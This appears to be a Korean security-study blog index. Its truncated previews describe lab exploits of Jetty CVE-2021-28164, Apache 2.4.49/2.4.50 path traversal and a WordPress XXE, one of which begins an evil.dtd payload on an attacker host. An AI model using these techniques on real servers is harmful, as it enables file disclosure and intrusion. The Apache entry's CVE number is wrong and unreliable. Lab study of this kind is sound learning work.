정보보안공부
■ 실습 환경 1) 취약서버 - 192.168.164.151:8080 Jetty 9.4.37.v20210219 ■ 취약점 설명 CVE-2021-28164 : %2e 또는 %2e%2e 문자가 포함된 URL 요청을 통해 WEB-INF 디렉토리 내 web.xml 파일에 접근이 가능함 ※ Jetty 9.4.37.v20210219 ~ 9.4.38.v20210224 버전에서 발생 ■ Exploit 1. jetty 환경 구현 ※ 참고 : https://www.itzgeek.com/how-tos/linux/centos-how-tos/install-jetty-web-server-on-centos-7-rhel-7.html 2. webapps 내 샘플 war 파일 이동 jetty 내 demo-base 하위 webapps에 ..
■ 실습 환경 1) 취약서버 - 192.168.164.150:9983 (docker) httpd:2.4.49 / httpd:2.4.50 ■ 취약점 설명 CVE-2021-29447 : 상위경로 문자를 판단하는 정규화 로직에서 결함이 발견되어 인코딩된 상위 경로 문자를 사용할 경우 서버 정보 획득이 가능함 ※ Apache HTTP Server 2.4.49 , 2.4.50 버전에서 발생 ■ Exploit 1. docker를 이용한 httpd 환경 구현 ※ docker pull httpd:2.4.49 ※ docker pull httpd:2.4.50 2. 설정파일 내 공격이 실행 가능하도록 취약하게 설정 #> vi /usr/local/apache2/conf/httpd.conf 해당 설정에서 granted가 아닌 ..
■ 실습 환경 1) 피해자 - 192.168.164.150:9980 docker-wordpress 환경 2) 공격자 - 192.168.164.148 아파치-php 환경 ■ 취약점 설명 CVE-2021-29447 : 파일을 업로드할 수 있는 사용자(예: 작성자)는 미디어 라이브러리의 XML 구문 분석 문제를 악용하여 XXE 공격을 일으킬 수 있습니다. ※ PHP8을 사용하는 Wordpress 환경에서 취약점 발생 ■ Exploit 1. wordpress 환경 구현 - docker-compose 이용 ※ 참고URL : https://github.com/dnr6419/CVE-2021-29447 2. 공격자 서버(192.168.164.148) 웹루트에 evil.dtd 파일 생성 % file SYSTEM "php..
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.